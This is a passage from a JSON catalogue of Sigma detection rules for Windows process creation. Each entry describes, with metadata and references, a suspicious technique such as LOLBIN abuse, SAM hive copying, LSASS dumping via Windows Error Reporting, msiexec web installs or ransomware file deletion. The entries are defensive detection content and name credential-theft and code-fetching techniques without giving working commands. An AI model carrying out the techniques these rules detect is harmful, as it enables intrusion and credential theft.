We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_appvlp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "value": "Using AppVLP To Circumvent ASR File Path Rule" + }, + { + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", + "meta": { + "author": "Ilya Krestinichev", + "creation_date": "2022/11/03", + "falsepositive": [ + "False positive could occur in admin scripts that execute inline" + ], + "filename": "proc_creation_win_susp_ping_del.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "value": "Suspicious Ping And Del Combination" + }, + { + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/11", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "value": "Suspicious Scheduled Task Creation Involving Temp Folder" + }, + { + "description": 
"Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_desktop_tunneling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "value": "Potential Remote Desktop Tunneling" + }, + { + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/09", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_msiexec_web_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "value": "MsiExec Web Install" + }, + { + "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", + 
"meta": { + "author": "blueteamer8699", + "creation_date": "2022/01/03", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" + ] + }, + "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "value": "GatherNetworkInfo.vbs Script Usage" + }, + { + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "value": "LOLBIN Execution Of The FTP.EXE Binary" + }, + { + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "value": "Exploiting CVE-2019-1388" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "value": "Always Install Elevated MSI Spawned Cmd And Powershell" + }, + { + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/04", + "falsepositive": [ + "Command lines that use the same flags" + ], + "filename": "proc_creation_win_proc_dump_createdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "value": "CreateDump Process Dump" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_delete_safeboot.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "value": "Delete SafeBoot Keys Via Reg Utility" + }, + { + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/29", + "falsepositive": [ + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "filename": "proc_creation_win_susp_powershell_sam_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1420546784250769408", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "1af57a4b-460a-4738-9034-db68b880c665", + "value": "PowerShell SAM Copy" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", + "value": "SILENTTRINITY Stager Execution" + }, + { + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_rubeus.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", + "https://github.com/GhostPack/Rubeus", + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "value": "Rubeus Hack Tool" + }, + { + "description": "Detects QBot like process executions", + "meta": { + 
"author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_qbot.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/killamjr/status/1179034907932315648", + "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "value": "QBot Process Creation" + }, + { + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_printbrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "value": "PrintBrm ZIP Creation of Extraction" + }, + { + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "meta": { + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." 
+ ], + "filename": "proc_creation_win_susp_net_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" + ] + }, + "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "value": "Net.exe Execution" + }, + { + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "filename": "proc_creation_win_shadow_copies_access_symlink.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" + ], + "tags": [ + "attack.credential_access", + 
"attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "value": "Shadow Copies Access via Symlink" + }, + { + "description": "Detects process creation with a renamed Msdt.exe", + "meta": { + "author": "pH-T", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "value": "Renamed Msdt.exe" + }, + { + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", + "value": "Hermetic Wiper TG Process Patterns" + }, + { + "description": "Detects the use of NSudo tool for command execution", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": 
"proc_creation_win_tool_nsudo_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://nsudo.m2team.org/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", + "value": "NSudo Tool Execution" + }, + { + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_utilityfunctions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", + "value": "UtilityFunctions.ps1 Proxy Dll" + }, + { + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. 
This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + ], + "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", + "value": "Suspicious Rundll32 Setupapi.dll Activity" + }, + { + "description": "Identifies creation of local users via the net.exe command.", + "meta": { + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." 
+ ], + "filename": "proc_creation_win_net_user_add.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "value": "Net.exe User Account Creation" + }, + { + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" + ], + "tags": "No established tags" + }, + "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "value": "Suspicious Kernel Dump Using Dtrace" + }, + { + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "value": "Suspicious RDP Redirect Using TSCON" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_netsupport.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "value": "Use of NetSupport Remote Access Software" + }, + { + "description": "Detects Hurricane Panda Activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hurricane_panda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ] + }, + "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", + "value": "Hurricane Panda Activity" + }, + { + "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + 
"https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "value": "Suspicious Encoded Obfuscated LOAD String" + }, + { + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "meta": { + "author": "@pbssubhash , Nasreddine Bencherchali", + "creation_date": "2022/12/08", + "falsepositive": [ + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + ], + "filename": "proc_creation_win_lsass_shtinkering.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_shtinkering.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "value": "Potential Credential Dumping Via WER" + }, + { + "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", + "value": "Renamed FTP.EXE Binary Execution" + }, + { + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "meta": { + "author": "Aedan Russell, frack113 (sigma)", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_chrome_load_extension.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1176" + ] + }, + "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "value": "Powershell ChromeLoader Browser Hijacker" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners", + "Some build frameworks" + ], + "filename": "proc_creation_win_crypto_mining_monero.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "value": "Windows Crypto 
Mining Indicators" + }, + { + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_jsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "value": "JSC Convert Javascript To Executable" + }, + { + "description": "Detects various anomalies in relation to regsvr32.exe", + "meta": { + "author": "Florian Roth, oscd.community, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ] + }, + "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "value": "Regsvr32 Anomaly" + }, + { + "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], 